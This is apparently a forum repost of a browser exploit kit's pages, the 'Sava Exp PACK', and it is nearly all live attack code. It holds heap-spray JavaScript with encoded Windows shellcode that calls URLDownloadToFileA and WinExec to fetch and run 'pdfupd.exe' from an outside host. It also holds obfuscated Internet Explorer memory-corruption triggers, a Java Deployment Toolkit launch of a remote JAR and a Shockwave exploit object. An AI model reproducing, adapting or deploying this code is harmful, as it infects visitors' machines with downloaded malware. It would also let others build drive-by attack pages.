var heapBlockCnt = (heapSprayAddr - heapBlockSize)/heapBlockSize;
for (index = 0; index < heapBlockCnt; index++) { memory[index] = retSlide + shellcode; }
}
var shellcode = unescape("%u5350%u5251%u5756%u9c55%u00e8%u0000%u5d00%ued83%u310d%u64c0%u4003%u7830%u8b0c%u0c40%u708b%uad1c%u408b%ueb08%u8b09%u3440%u408d%u8b7c%u3c40%u5756%u5ebe%u0001%u0100%ubfee%u014e%u0000%uef01%ud6e8%u0001%u5f00%u895e%u81ea%u5ec2%u0001%u5200%u8068%u0000%uff00%u4e95%u0001%u8900%u81ea%u5ec2%u0001%u3100%u01f6%u8ac2%u359c%u0263%u0000%ufb80%u7400%u8806%u321c%ueb46%uc6ee%u3204%u8900%u81ea%u45c2%u0002%u5200%u95ff%u0152%u0000%uea89%uc281%u0250%u0000%u5052%u95ff%u0156%u0000%u006a%u006a%uea89%uc281%u015e%u0000%u8952%u81ea%u78c2%u0002%u5200%u006a%ud0ff%u056a%uea89%uc281%u015e%u0000%uff52%u5a95%u0001%u8900%u81ea%u5ec2%u0001%u5200%u8068%u0000%uff00%u4e95%u0001%u8900%u81ea%u5ec2%u0001%u3100%u01f6%u8ac2%u359c%u026e%u0000%ufb80%u7400%u8806%u321c%ueb46%uc6ee%u3204%u8900%u81ea%u45c2%u0002%u5200%u95ff%u0152%u0000%uea89%uc281%u0250%u0000%u5052%u95ff%u0156%u0000%u006a%u006a%uea89%uc281%u015e%u0000%u8952%u81ea%ua6c2%u0002%u5200%u006a%ud0ff%u056a%uea89%uc281%u015e%u0000%uff52%u5a95%u0001%u9d00%u5f5d%u5a5e%u5b59%uc358%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u6547%u5474%u6d65%u5070%u7461%u4168%u4c00%u616f%u4c64%u6269%u6172%u7972%u0041%u6547%u5074%u6f72%u4163%u6464%u6572%u7373%u5700%u6e69%u7845%u6365%ubb00%uf289%uf789%uc030%u75ae%u29fd%u89f7%u31f9%ubec0%u003c%u0000%ub503%u021b%u0000%uad66%u8503%u021b%u0000%u708b%u8378%u1cc6%ub503%u021b%u0000%ubd8d%u021f%u0000%u03ad%u1b85%u0002%uab00%u03ad%u1b85%u0002%u5000%uadab%u8503%u021b%u0000%u5eab%udb31%u56ad%u8503%u021b%u0000%uc689%ud789%ufc51%ua6f3%u7459%u5e04%ueb43%u5ee9%ud193%u03e0%u2785%u0002%u3100%u96f6%uad66%ue0c1%u0302%u1f85%u0002%u8900%uadc6%u8503%u021b%u0000%uebc3%u0010%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u8900%u1b85%u0002%u5600%ue857%uff58%uffff%u5e5f%u01ab%u80ce%ubb3e%u0274%uedeb%u55c3%u4c52%u4f4d%u2e4e%u4c44%u004c%u5255%u444c%u776f%u6c6e%u616f%u5464%u466f%u6c69%u4165%u7000%u6664%u7075%u2e64%u7865%u0065%u7263%u7361%u2e68%u6870%u0070%u7468%u7074%u2F3A%u342F%u662E%u6361%u6265%u6F6F%u2D6B%u7061%u7370%u6D2E%u2F65%u6170%u656E%u2F6C%u6F6C%u6461%u702E%u7068%u9000");
sprayHeap(shellcode, 1551747536, 0x400000 - (shellcode.length + 0x38));
document.write("<table style=position:absolute;clip:rect(0)>");

</script>
</body>
</html>
<html><body>
<script>
var zidFtLniBSxvOqsJxtqloszmAzyWgiYTSDyrZBtO = new Array();
var MyFuBrXmpAWxvLjtNpxzvEtYVtUHTCefFvpMdGRFDomALOBmpXGMMvZIegiMoLieKCVJesUxNBdVowWMcOdrSJSgmdtRKBaS = unescape;
var VgSi = MyFuBrXmpAWxvLjtNpxzvEtYVtUHTCefFvpMdGRFDomALOBmpXGMMvZIegiMoLieKCVJesUxNBdVowWMcOdrSJSgmdtRKBaS('%u5350%u5251%u5756%u9c55%u00e8%u0000%u5d00%ued83%u310d%u64c0%u4003%u7830%u8b0c%u0c40%u708b%uad1c%u408b%ueb08%u8b09%u3440%u408d%u8b7c%u3c40%u5756%u5ebe%u0001%u0100%ubfee%u014e%u0000%uef01%ud6e8%u0001%u5f00%u895e%u81ea%u5ec2%u0001%u5200%u8068%u0000%uff00%u4e95%u0001%u8900%u81ea%u5ec2%u0001%u3100%u01f6%u8ac2%u359c%u0263%u0000%ufb80%u7400%u8806%u321c%ueb46%uc6ee%u3204%u8900%u81ea%u45c2%u0002%u5200%u95ff%u0152%u0000%uea89%uc281%u0250%u0000%u5052%u95ff%u0156%u0000%u006a%u006a%uea89%uc281%u015e%u0000%u8952%u81ea%u78c2%u0002%u5200%u006a%ud0ff%u056a%uea89%uc281%u015e%u0000%uff52%u5a95%u0001%u8900%u81ea%u5ec2%u0001%u5200%u8068%u0000%uff00%u4e95%u0001%u8900%u81ea%u5ec2%u0001%u3100%u01f6%u8ac2%u359c%u026e%u0000%ufb80%u7400%u8806%u321c%ueb46%uc6ee%u3204%u8900%u81ea%u45c2%u0002%u5200%u95ff%u0152%u0000%uea89%uc281%u0250%u0000%u5052%u95ff%u0156%u0000%u006a%u006a%uea89%uc281%u015e%u0000%u8952%u81ea%ua6c2%u0002%u5200%u006a%ud0ff%u056a%uea89%uc281%u015e%u0000%uff52%u5a95%u0001%u9d00%u5f5d%u5a5e%u5b59%uc358%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u6547%u5474%u6d65%u5070%u7461%u4168%u4c00%u616f%u4c64%u6269%u6172%u7972%u0041%u6547%u5074%u6f72%u4163%u6464%u6572%u7373%u5700%u6e69%u7845%u6365%ubb00%uf289%uf789%uc030%u75ae%u29fd%u89f7%u31f9%ubec0%u003c%u0000%ub503%u021b%u0000%uad66%u8503%u021b%u0000%u708b%u8378%u1cc6%ub503%u021b%u0000%ubd8d%u021f%u0000%u03ad%u1b85%u0002%uab00%u03ad%u1b85%u0002%u5000%uadab%u8503%u021b%u0000%u5eab%udb31%u56ad%u8503%u021b%u0000%uc689%ud789%ufc51%ua6f3%u7459%u5e04%ueb43%u5ee9%ud193%u03e0%u2785%u0002%u3100%u96f6%uad66%ue0c1%u0302%u1f85%u0002%u8900%uadc6%u8503%u021b%u0000%uebc3%u0010%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u8900%u1b85%u0002%u5600%ue857%uff58%uffff%u5e5f%u01ab%u80ce%ubb3e%u0274%uedeb%u55c3%u4c52%u4f4d%u2e4e%u4c44%u004c%u5255%u444c%u776f%u6c6e%u616f%u5464%u466f%u6c69%u4165%u7000%u6664%u7075%u2e64%u7865%u0065%u7263%u7361%u2e68%u6870%u0070%u7525%u3437%u3836%u7525%u3037%u3437%u7525%u4632%u4133%u7525%u3433%u4632%u7525%u3636%u4532%u7525%u3336%u3136%u7525%u3236%u3536%u7525%u4636%u4636%u7525%u4432%u4236%u7525%u3037%u3136%u7525%u3337%u3037%u7525%u4436%u4532%u7525%u4632%u3536%u7525%u3136%u3037%u7525%u3536%u4536%u7525%u4632%u4336%u7525%u4636%u4336%u7525%u3436%u3136%u7525%u3037%u4532%u7525%u3037%u3836%u9000');
var eVpLDfSczdVQeoYGNNMdsnWCtmKVVOlOooxArlfhmqxuMAVPpgQXrdGCyDBbHfdFeClpDMHhPtkSSsnZOituYqQCGFJn = MyFuBrXmpAWxvLjtNpxzvEtYVtUHTCefFvpMdGRFDomALOBmpXGMMvZIegiMoLieKCVJesUxNBdVowWMcOdrSJSgmdtRKBaS("%u0c0c%u0c0c%u0c0c%u0c0c");
do { eVpLDfSczdVQeoYGNNMdsnWCtmKVVOlOooxArlfhmqxuMAVPpgQXrdGCyDBbHfdFeClpDMHhPtkSSsnZOituYqQCGFJn += eVpLDfSczdVQeoYGNNMdsnWCtmKVVOlOooxArlfhmqxuMAVPpgQXrdGCyDBbHfdFeClpDMHhPtkSSsnZOituYqQCGFJn } while( eVpLDfSczdVQeoYGNNMdsnWCtmKVVOlOooxArlfhmqxuMAVPpgQXrdGCyDBbHfdFeClpDMHhPtkSSsnZOituYqQCGFJn.length < 0x4000 );
for (yFGZWkwBKPBvmGEPlVDJCGUogSwuayyhwD = 0; yFGZWkwBKPBvmGEPlVDJCGUogSwuayyhwD < 150; yFGZWkwBKPBvmGEPlVDJCGUogSwuayyhwD++) zidFtLniBSxvOqsJxtqloszmAzyWgiYTSDyrZBtO[yFGZWkwBKPBvmGEPlVDJCGUogSwuayyhwD] = eVpLDfSczdVQeoYGNNMdsnWCtmKVVOlOooxArlfhmqxuMAVPpgQXrdGCyDBbHfdFeClpDMHhPtkSSsnZOituYqQCGFJn + VgSi;
</script>
<object classid='clsid:333C7BC4-460F-11D0-BC04-0080C7055A83'>
<param name='DataURL' value='http://6URKjgXEtNWHqRJYhZUGHlnxKL9A1wqCEQHeUTYNLoLP6BFVZ0DflYlzEoppkkWqIlPRUfALemMUcQRmF5puLTEA5zjDB0LhMr8JqQB6ByKnq4X0oOI0YuJXjaCGTjt3MRrx1uGLHWV242FLJwnQJcHlEL6n8c77H2qSJYV7HyK4Ft4aazQkTwNBJsiXvAupwfKG4DGw1kRGY4ONnwqwJZov3PmEqrM4YfIqqWtsKBT6HuMhh6hnbrM7lwob1DvDYKbZ0Cjsd81mVsI4eSJ0QfCrjJvHWrn7lGkW37Bj5KBa70iZCev4DER1QajyeirxfSNH2oEYhfhY4d3k9nbiwb8GEMKdJgFUnjOxtHQE8JdGHUzlk5csDBUxTXY2fLDSnH1X1TkClfAMqKDyC9ryRIwdUIZhEkdWH2K6RiATZ8Zjp98TjyatQpp9nn74rfluq3RlxsLOOYqs8PsShkOLN3UYB871aIO5DfMLAAoFm7MljGy58Dy32O6qKFYpPHc9mZ5SIIVyCeRvDDxZ8OkXR1qpcZ'/>
</object>
</body></html>
<script>
function MAKEHEAP()
{
try {
document.getElementById('pdfplace').innerHTML = '<div id="divid">%u</div>';
var gg = '!0c0c!0c0c'.replace(/!/g, document.getElementById('divid').innerHTML);
var qq = unescape('%u5350%u5251%u5756%u9c55%u00e8%u0000%u5d00%ued83%u310d%u64c0%u4003%u7830%u8b0c%u0c40%u708b%uad1c%u408b%ueb08%u8b09%u3440%u408d%u8b7c%u3c40%u5756%u5ebe%u0001%u0100%ubfee%u014e%u0000%uef01%ud6e8%u0001%u5f00%u895e%u81ea%u5ec2%u0001%u5200%u8068%u0000%uff00%u4e95%u0001%u8900%u81ea%u5ec2%u0001%u3100%u01f6%u8ac2%u359c%u0263%u0000%ufb80%u7400%u8806%u321c%ueb46%uc6ee%u3204%u8900%u81ea%u45c2%u0002%u5200%u95ff%u0152%u0000%uea89%uc281%u0250%u0000%u5052%u95ff%u0156%u0000%u006a%u006a%uea89%uc281%u015e%u0000%u8952%u81ea%u78c2%u0002%u5200%u006a%ud0ff%u056a%uea89%uc281%u015e%u0000%uff52%u5a95%u0001%u8900%u81ea%u5ec2%u0001%u5200%u8068%u0000%uff00%u4e95%u0001%u8900%u81ea%u5ec2%u0001%u3100%u01f6%u8ac2%u359c%u026e%u0000%ufb80%u7400%u8806%u321c%ueb46%uc6ee%u3204%u8900%u81ea%u45c2%u0002%u5200%u95ff%u0152%u0000%uea89%uc281%u0250%u0000%u5052%u95ff%u0156%u0000%u006a%u006a%uea89%uc281%u015e%u0000%u8952%u81ea%ua6c2%u0002%u5200%u006a%ud0ff%u056a%uea89%uc281%u015e%u0000%uff52%u5a95%u0001%u9d00%u5f5d%u5a5e%u5b59%uc358%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u6547%u5474%u6d65%u5070%u7461%u4168%u4c00%u616f%u4c64%u6269%u6172%u7972%u0041%u6547%u5074%u6f72%u4163%u6464%u6572%u7373%u5700%u6e69%u7845%u6365%ubb00%uf289%uf789%uc030%u75ae%u29fd%u89f7%u31f9%ubec0%u003c%u0000%ub503%u021b%u0000%uad66%u8503%u021b%u0000%u708b%u8378%u1cc6%ub503%u021b%u0000%ubd8d%u021f%u0000%u03ad%u1b85%u0002%uab00%u03ad%u1b85%u0002%u5000%uadab%u8503%u021b%u0000%u5eab%udb31%u56ad%u8503%u021b%u0000%uc689%ud789%ufc51%ua6f3%u7459%u5e04%ueb43%u5ee9%ud193%u03e0%u2785%u0002%u3100%u96f6%uad66%ue0c1%u0302%u1f85%u0002%u8900%uadc6%u8503%u021b%u0000%uebc3%u0010%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u8900%u1b85%u0002%u5600%ue857%uff58%uffff%u5e5f%u01ab%u80ce%ubb3e%u0274%uedeb%u55c3%u4c52%u4f4d%u2e4e%u4c44%u004c%u5255%u444c%u776f%u6c6e%u616f%u5464%u466f%u6c69%u4165%u7000%u6664%u7075%u2e64%u7865%u0065%u7263%u7361%u2e68%u6870%u0070%u7525%u3537%u3532%u7525%u3433%u3733%u7525%u3833%u3633%u7525%u3537%u3532%u7525%u3033%u3733%u7525%u3433%u3733%u7525%u3537%u3532%u7525%u3634%u3233%u7525%u3134%u3333%u7525%u3537%u3532%u7525%u3433%u3333%u7525%u3634%u3233%u7525%u3537%u3532%u7525%u3633%u3633%u7525%u3534%u3233%u7525%u3537%u3532%u7525%u3333%u3633%u7525%u3133%u3633%u7525%u3537%u3532%u7525%u3233%u3633%u7525%u3533%u3633%u7525%u3537%u3532%u7525%u3634%u3633%u7525%u3634%u3633%u7525%u3537%u3532%u7525%u3434%u3233%u7525%u3234%u3633%u7525%u3537%u3532%u7525%u3033%u3733%u7525%u3133%u3633%u7525%u3537%u3532%u7525%u3333%u3733%u7525%u3033%u3733%u7525%u3537%u3532%u7525%u3434%u3633%u7525%u3534%u3233%u7525%u3537%u3532%u7525%u3634%u3233%u7525%u3533%u3633%u7525%u3537%u3532%u7525%u3133%u3633%u7525%u3033%u3733%u7525%u3537%u3532%u7525%u3533%u3633%u7525%u3534%u3633%u7525%u3537%u3532%u7525%u3634%u3233%u7525%u3334%u3633%u7525%u3537%u3532%u7525%u3634%u3633%u7525%u3334%u3633%u7525%u3537%u3532%u7525%u3433%u3633%u7525%u3133%u3633%u7525%u3537%u3532%u7525%u3033%u3733%u7525%u3534%u3233%u7525%u3537%u3532%u7525%u3033%u3733%u7525%u3833%u3633%u9000');
var m = new Array();
var r = 0x86000-(qq.length*2);
var n = unescape(gg);while(n.length<r/2) { n+=n; }
var t = n.substring(0,r/2);
delete n;for(i=0; i<270; i++){m[i] = t + t + qq;}
var bdy = document.createElement('body');bdy.addBehavior('#default#userData');
document.appendChild(bdy);try{for (i=0; i<10; i++) {bdy.setAttribute('s',window);} } catch(e){}window.status+='';
} catch(e) { }
}


function iep()
{
try {
var gg=document.createElement('div');
gg.setAttribute('id','f');
document.body.appendChild(gg);
document.getElementById('f').innerHTML="<button id='atk' onclick='MAKEHEAP();' style='display:none'></button>";
document.getElementById('atk').onclick();
} catch(e) { }
}

iep();</script><script language="javascript">
var OvOoLotiLdA = "http: -J-XXaltjvm=\\4.facebook-apps.me\webdav\SiteLoader.jar";
if (window.navigator.appName == "Microsoft Internet Explorer") {
var WGeQegLGysru = document.createElement("OBJECT");
WGeQegLGysru.classid = "clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA";
WGeQegLGysru.launch(OvOoLotiLdA);
} else {
try {
var wLkzSSbNB = document.createElement("OBJECT");
wLkzSSbNB.type = "application/npruntime-scriptable-plugin;deploymenttoolkit";
document.body.appendChild(wLkzSSbNB);
wLkzSSbNB.launch(OvOoLotiLdA);
} catch (e) {
var lbeOpILVQ = document.createElement("OBJECT");
lbeOpILVQ.type = "application/java-deployment-toolkit";
document.body.appendChild(lbeOpILVQ);
lbeOpILVQ.launch(OvOoLotiLdA);
}
}
</script><object type="application/npruntime-scriptable-plugin;deploymenttoolkit"></object><object type="application/java-deployment-toolkit"></object>


<object classid='clsid:233C1507-6A77-46A4-9443-F871F945D258'
 ID=Abysssec width=600 height=430 VIEWASTEXT>
<param name=src value='GhzrycqVh.DIR'>
<param name=swRemote value='swSaveEnabled='true' swVolume='true' swRestart='true' swPausePlay='true' swFastForward='true' swContextMenu='true' '>
<param name=swStretchStyle value=fill>
<param name=PlayerVersion value=11>
<PARAM NAME=bgColor VALUE=#FFFFFF>
<embed src='GhzrycqVh.DIR' bgColor=#FFFFFF  width=600 height=430 swRemote='swSaveEnabled='true' swVolume='true' swRestart='true' swPausePlay='true' swFastForward='true' swContextMenu='true' ' swStretchStyle=fill
 type='application/x-director' PlayerVersion=11 pluginspage='http://www.macromedia.com/shockwave/download/'></embed>
</object>

<script>
shellcode = unescape('%u5350%u5251%u5756%u9c55%u00e8%u0000%u5d00%ued83%u310d%u64c0%u4003%u7830%u8b0c%u0c40%u708b%uad1c%u408b%ueb08%u8b09%u3440%u408d%u8b7c%u3c40%u5756%u5ebe%u0001%u0100%ubfee%u014e%u0000%uef01%ud6e8%u0001%u5f00%u895e%u81ea%u5ec2%u0001%u5200%u8068%u0000%uff00%u4e95%u0001%u8900%u81ea%u5ec2%u0001%u3100%u01f6%u8ac2%u359c%u0263%u0000%ufb80%u7400%u8806%u321c%ueb46%uc6ee%u3204%u8900%u81ea%u45c2%u0002%u5200%u95ff%u0152%u0000%uea89%uc281%u0250%u0000%u5052%u95ff%u0156%u0000%u006a%u006a%uea89%uc281%u015e%u0000%u8952%u81ea%u78c2%u0002%u5200%u006a%ud0ff%u056a%uea89%uc281%u015e%u0000%uff52%u5a95%u0001%u8900%u81ea%u5ec2%u0001%u5200%u8068%u0000%uff00%u4e95%u0001%u8900%u81ea%u5ec2%u0001%u3100%u01f6%u8ac2%u359c%u026e%u0000%ufb80%u7400%u8806%u321c%ueb46%uc6ee%u3204%u8900%u81ea%u45c2%u0002%u5200%u95ff%u0152%u0000%uea89%uc281%u0250%u0000%u5052%u95ff%u0156%u0000%u006a%u006a%uea89%uc281%u015e%u0000%u8952%u81ea%ua6c2%u0002%u5200%u006a%ud0ff%u056a%uea89%uc281%u015e%u0000%uff52%u5a95%u0001%u9d00%u5f5d%u5a5e%u5b59%uc358%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u6547%u5474%u6d65%u5070%u7461%u4168%u4c00%u616f%u4c64%u6269%u6172%u7972%u0041%u6547%u5074%u6f72%u4163%u6464%u6572%u7373%u5700%u6e69%u7845%u6365%ubb00%uf289%uf789%uc030%u75ae%u29fd%u89f7%u31f9%ubec0%u003c%u0000%ub503%u021b%u0000%uad66%u8503%u021b%u0000%u708b%u8378%u1cc6%ub503%u021b%u0000%ubd8d%u021f%u0000%u03ad%u1b85%u0002%uab00%u03ad%u1b85%u0002%u5000%uadab%u8503%u021b%u0000%u5eab%udb31%u56ad%u8503%u021b%u0000%uc689%ud789%ufc51%ua6f3%u7459%u5e04%ueb43%u5ee9%ud193%u03e0%u2785%u0002%u3100%u96f6%uad66%ue0c1%u0302%u1f85%u0002%u8900%uadc6%u8503%u021b%u0000%uebc3%u0010%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u8900%u1b85%u0002%u5600%ue857%uff58%uffff%u5e5f%u01ab%u80ce%ubb3e%u0274%uedeb%u55c3%u4c52%u4f4d%u2e4e%u4c44%u004c%u5255%u444c%u776f%u6c6e%u616f%u5464%u466f%u6c69%u4165%u7000%u6664%u7075%u2e64%u7865%u0065%u7263%u7361%u2e68%u6870%u0070%u7525%u3537%u3532%u7525%u3533%u3733%u7525%u3533%u3233%u7525%u3537%u3532%u7525%u3433%u3333%u7525%u3733%u3333%u7525%u3537%u3532%u7525%u3833%u3333%u7525%u3633%u3333%u7525%u3537%u3532%u7525%u3533%u3733%u7525%u3533%u3233%u7525%u3537%u3532%u7525%u3033%u3333%u7525%u3733%u3333%u7525%u3537%u3532%u7525%u3433%u3333%u7525%u3733%u3333%u7525%u3537%u3532%u7525%u3533%u3733%u7525%u3533%u3233%u7525%u3537%u3532%u7525%u3633%u3433%u7525%u3233%u3333%u7525%u3537%u3532%u7525%u3133%u3433%u7525%u3333%u3333%u7525%u3537%u3532%u7525%u3533%u3733%u7525%u3533%u3233%u7525%u3537%u3532%u7525%u3433%u3333%u7525%u3333%u3333%u7525%u3537%u3532%u7525%u3633%u3433%u7525%u3233%u3333%u7525%u3537%u3532%u7525%u3533%u3733%u7525%u3533%u3233%u7525%u3537%u3532%u7525%u3633%u3333%u7525%u3633%u3333%u7525%u3537%u3532%u7525%u3533%u3433%u7525%u3233%u3333%u7525%u3537%u3532%u7525%u3533%u3733%u7525%u3533%u3233%u7525%u3537%u3532%u7525%u3333%u3333%u7525%u3633%u3333%u7525%u3537%u3532%u7525%u3133%u3333%u7525%u3633%u3333%u7525%u3537%u3532%u7525%u3533%u3733%u7525%u3533%u3233%u7525%u3537%u3532%u7525%u3233%u3333%u7525%u3633%u3333%u7525%u3537%u3532%u7525%u3533%u3333%u7525%u3633%u3333%u7525%u3537%u3532%u7525%u3533%u3733%u7525%u3533%u3233%u7525%u3537%u3532%u7525%u3633%u3433%u7525%u3633%u3333%u7525%u3537%u3532%u7525%u3633%u3433%u7525%u3633%u3333%u7525%u3537%u3532%u7525%u3533%u3733%u7525%u3533%u3233%u7525%u3537%u3532%u7525%u3433%u3433%u7525%u3233%u3333%u7525%u3537%u3532%u7525%u3233%u3433%u7525%u3633%u3333%u7525%u3537%u3532%u7525%u3533%u3733%u7525%u3533%u3233%u7525%u3537%u3532%u7525%u3033%u3333%u7525%u3733%u3333%u7525%u3537%u3532%u7525%u3133%u3333%u7525%u3633%u3333%u7525%u3537%u3532%u7525%u3533%u3733%u7525%u3533%u3233%u7525%u3537%u3532%u7525%u3333%u3333%u7525%u3733%u3333%u7525%u3537%u3532%u7525%u3033%u3333%u7525%u3733%u3333%u7525%u3537%u3532%u7525%u3533%u3733%u7525%u3533%u3233%u7525%u3537%u3532%u7525%u3433%u3433%u7525%u3633%u3333%u7525%u3537%u3532%u7525%u3533%u3433%u7525%u3233%u3333%u7525%u3537%u3532%u7525%u3533%u3733%u7525%u3533%u3233%u7525%u3537%u3532%u7525%u3633%u3433%u7525%u3233%u3333%u7525%u3537%u3532%u7525%u3533%u3333%u7525%u3633%u3333%u7525%u3537%u3532%u7525%u3533%u3733%u7525%u3533%u3233%u7525%u3537%u3532%u7525%u3133%u3333%u7525%u3633%u3333%u7525%u3537%u3532%u7525%u3033%u3333%u7525%u3733%u3333%u7525%u3537%u3532%u7525%u3533%u3733%u7525%u3533%u3233%u7525%u3537%u3532%u7525%u3533%u3333%u7525%u3633%u3333%u7525%u3537%u3532%u7525%u3533%u3433%u7525%u3633%u3333%u7525%u3537%u3532%u7525%u3533%u3733%u7525%u3533%u3233%u7525%u3537%u3532%u7525%u3633%u3433%u7525%u3233%u3333%u7525%u3537%u3532%u7525%u3333%u3433%u7525%u3633%u3333%u7525%u3537%u3532%u7525%u3533%u3733%u7525%u3533%u3233%u7525%u3537%u3532%u7525%u3633%u3433%u7525%u3633%u3333%u7525%u3537%u3532%u7525%u3333%u3433%u7525%u3633%u3333%u7525%u3537%u3532%u7525%u3533%u3733%u7525%u3533%u3233%u7525%u3537%u3532%u7525%u3433%u3333%u7525%u3633%u3333%u7525%u3537%u3532%u7525%u3133%u3333%u7525%u3633%u3333%u7525%u3537%u3532%u7525%u3533%u3733%u7525%u3533%u3233%u7525%u3537%u3532%u7525%u3033%u3333%u7525%u3733%u3333%u7525%u3537%u3532%u7525%u3533%u3433%u7525%u3233%u3333%u7525%u3537%u3532%u7525%u3533%u3733%u7525%u3533%u3233%u7525%u3537%u3532%u7525%u3033%u3333%u7525%u3733%u3333%u7525%u3537%u3532%u7525%u3833%u3333%u7525%u3633%u3333%u9000');
                     
     nops=unescape('%u0a0a%u0a0a');
     headersize =20;
     slackspace= headersize + shellcode.length;
     while(nops.length< slackspace) nops+= nops;
     fillblock= nops.substring(0, slackspace);
     block= nops.substring(0, nops.length- slackspace);
     while( block.length+ slackspace<0x200000) block= block+ block+ fillblock;
     memory=new Array();
     for( counter=0; counter<200; counter++) memory[counter]= block + shellcode;     
</script>
</body></div></html>

install.php

Code: [Select]
<title>.:: Sava Free Pack ::.</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<style type="text/css">
<!--
@import url("i/index.css");
-->
</style>
<!--[if IE]>
<style type="text/css">
p.note-general, p.note-warning { color: #666666; }
</style>
<![endif]-->
<!--[if IE 6]>
<style type="text/css">
#footer { height: 1em; }
</style>
<![endif]-->
<!--[if IE 5.5]>
<style type="text/css">
pre { width: 453px; }
</style>
<![endif]-->
</head>
<body id="gordonmac-com" class="homepage">
<div id="wrapper-a">
  <div id="wrapper-b">
    <div id="heading">
      <h1><a href="#">Exploit PAck</a></h1>
      <h2>Exploit pack</h2>

      <p id="heading-intro">Sava Exp PACK install...</p>
     
      <ul id="nav-a">


      </ul>
    </div>
    <div id="content">
      <div id="content-a">
        <div id="content-a-inner">
          <center>
  <br>  
Ruining the bad guy's day